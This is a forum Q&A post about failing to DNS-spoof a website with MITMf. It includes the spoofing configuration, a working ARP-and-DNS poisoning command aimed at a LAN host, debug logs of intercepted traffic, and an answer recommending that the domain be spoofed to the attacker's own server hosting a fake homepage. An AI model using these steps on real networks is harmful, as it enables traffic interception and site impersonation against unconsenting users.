# trying to dns spoof using mitmf

Tags: dns, kali-linux

I am trying to redirect a page of taulukko.com to google.com for learning purposes but no success.

When i enter in the taulukko.com from the spoofed node i receive:

```
The webpage cannot be found
```

my mitmf.conf:

```
#Supported formats are 8.8.8.8#53 or 4.2.2.1#53#tcp or 2001:4860:4860::8888
        #can also be a comma seperated list e.g 8.8.8.8,8.8.4.4
        #
        nameservers = 8.8.8.8

        [[[A]]]     # Queries for IPv4 address records
        #*.thesprawls.org=192.0.2.1
        *.taulukko.com=201.55.233.116

        [[[AAAA]]]  # Queries for IPv6 address records
        *.thesprawl.org=2001:db8::1

        [[[MX]]]    # Queries for mail server records
        *.thesprawl.org=mail.fake.com

        [[[NS]]]    # Queries for mail server records
        *.thesprawl.org=ns.fake.com

        [[[CNAME]]] # Queries for alias records
        *.thesprawl.org=www.fake.com

        [[[TXT]]]   # Queries for text records
        *.thesprawl.org=fake message

        [[[PTR]]]   # PTR queries
        *.2.0.192.in-addr.arpa=fake.com

        [[[SOA]]] #FORMAT: mname rname t1 t2 t3 t4 t5
        *.thesprawl.org=ns.fake.com. hostmaster.fake.com. 1 10800 3600 604800 3600

        [[[NAPTR]]] #FORMAT: order preference flags service regexp replacement
        *.thesprawl.org=100 10 U E2U+sip !^.*$!sip:customer-service@fake.com! .

        [[[SRV]]] #FORMAT: priority weight port target
        *.*.thesprawl.org=0 5 5060 sipserver.fake.com
```

the command:

```
mitmf -i wlan0 --spoof --arp --dns --gateway 192.168.0.1 --target 192.168.0.16 --log debug
```

the debug:

```
2016-02-20 18:05:47 [Utils] Setting iptables DNS redirection rule from port 53 to 53
2016-02-20 18:05:47 [Utils] Setting ip forwarding to 1
2016-02-20 18:05:47 [Utils] Flushing iptables
2016-02-20 18:05:47 [Utils] Setting iptables HTTP redirection rule from port 80 to 10000
2016-02-20 18:05:47 [ARPpoisoner] gatewayip  => 192.168.0.1
2016-02-20 18:05:47 [ARPpoisoner] gatewaymac => X:X:X:X:X:X
2016-02-20 18:05:47 [ARPpoisoner] targets    => ['192.168.0.16']
2016-02-20 18:05:47 [ARPpoisoner] targetmac  => None
2016-02-20 18:05:47 [ARPpoisoner] mymac      => X:X:X:X:X:X
2016-02-20 18:05:47 [ARPpoisoner] interface  => wlan0
2016-02-20 18:05:47 [ARPpoisoner] arpmode    => rep
2016-02-20 18:05:47 [ARPpoisoner] interval   => 3
2016-02-20 18:05:47 [ProxyPlugins] Adding Spoof plugin
2016-02-20 18:05:47 [SMBserver] Config file parsed
2016-02-20 18:05:47 [SMBserver] Callback added for UUID X-X-X-X-X V:3.0
2016-02-20 18:05:47 [SMBserver] Config file parsed
2016-02-20 18:05:49 [ClientRequest] Resolving host: www.taulukko.com
2016-02-20 18:05:49 [ClientRequest] Host not cached.
2016-02-20 18:05:49 [ClientRequest] Resolving with DNSChef
2016-02-20 18:05:49 [ClientRequest] Resolved host successfully: www.taulukko.com -> 201.55.233.116
2016-02-20 18:05:49 [ClientRequest] Zapped encoding
2016-02-20 18:05:49 [ClientRequest] Sending request via HTTP
2016-02-20 18:05:49 [ServerConnection] HTTP connection made.
2016-02-20 18:05:49 [ProxyPlugins] hooking connectionMade()
2016-02-20 18:05:49 192.168.0.16 [type:IE 8.0 os:Windows 7] Sending Request: www.taulukko.com
2016-02-20 18:05:49 [ServerConnection] Full request: www.taulukko.com/
2016-02-20 18:05:49 [ServerConnection] Sending header: (host: www.taulukko.com)
2016-02-20 18:05:49 [ServerConnection] Sending header: (accept-language: en-US)
2016-02-20 18:05:49 [ServerConnection] Sending header: (connection: Keep-Alive)
2016-02-20 18:05:49 [ServerConnection] Sending header: (accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*)
2016-02-20 18:05:49 [ServerConnection] Sending header: (user-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0))
2016-02-20 18:05:49 [ServerConnection] Server response: HTTP/1.0 404 Not Found
2016-02-20 18:05:49 [ProxyPlugins] hooking handleEndHeaders()
2016-02-20 18:05:49 [ServerConnection] Receiving header: (x-xss-protection: 1; mode=block)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (server: HTTP server (unknown))
2016-02-20 18:05:49 [ServerConnection] Receiving header: (connection: Keep-Alive)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (date: Sat, 20 Feb 2016 20:05:49 GMT)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (x-frame-options: SAMEORIGIN)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (content-type: text/html)
2016-02-20 18:05:49 [ProxyPlugins] hooking handleResponse()
2016-02-20 18:05:49 [ServerConnection] Read from server 49 bytes of data
2016-02-20 18:05:54 [ARPpoisoner] Restoring connection 192.168.0.16 <-> 192.168.0.1 with 2 packets per host
2016-02-20 18:05:54 [Utils] Flushing iptables
2016-02-20 18:05:54 [Utils] Setting ip forwarding to 0
```

Comment: You need to define what exactly you are trying to achieve. DNS spoof is not a redirect. You can make a DNS spoof to make the client think he is in some site that suppose to resolve to 1.2.3.4 and instead resolve it to some other address that you in control and serve your site.

Comment: i would suggest using ettercap and youtube how to DNS spoof with ettercap .... it uses a GUI so its nice and simple..

Answer (score 1):

Dns-spoof is not redirection.

In this mitm case whenever the victim doesn't know the IP of taulakku.com it will send DNS queries.
And in return will get the corresponding IP from the DNS server.

In dnsspoof
Attacker will flood the victim with his crafted DNS reply.

So now whenever victim asks for taulukko's IP , it acknowledges the crafted DNS replies.

Example:if attackers dnsspoof's taulukko's ip to Google's ip.

Attacker dns queries says IP of taulukko.com is (google's ip). So now the victim asks for taulukko.com webpage from google ip.

Which is not present (check http header).hence you get webpage not found.

Now solution:
Dnspoof taulukko.com to your IP and run your server with taulakku homepage. The victim gets your page not the original taulukko's
 homepage.
(Check packets in wireshark to verify everything)
:-)

[Good link for dnsspoof](http://www.thegeekstuff.com/2012/05/ettercap-tutorial/)